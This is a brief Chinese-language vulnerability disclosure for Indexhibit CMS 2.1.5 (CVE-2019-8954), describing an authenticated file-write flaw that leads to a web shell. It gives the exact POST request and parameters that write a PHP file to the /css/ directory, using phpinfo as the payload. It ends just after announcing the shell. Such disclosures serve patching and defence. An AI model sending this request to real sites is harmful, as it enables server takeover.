跳转至

Indexhibit cms v2.1.5 直接编辑php文件getshell

漏洞简介

漏洞名称 上报日期 漏洞发现者 产品首页 软件链接 版本 CVE编号
indexhibit cms v2.1.5 直接编辑php文件getshell 2019-02-20 yc(3365487579@qq.com https://www.indexhibit.org/ https://www.indexhibit.org/ v2.1.5 CVE-2019-8954

漏洞概述

indexhibit CMS 2.1.5版本存在一个直接编辑php文件的漏洞,导致getshell。

POC实现代码如下:

当我们登录进后台后,向/ndxzstudio/?a=system
post数据:

upd_jxcode=true&v=%253C%253Fphp%2520phpinfo()%253B%253F%253E&id=%2Fcss%2Faudio.php

即可在/css/目录写入一个php文件audio.php。

成功getshell: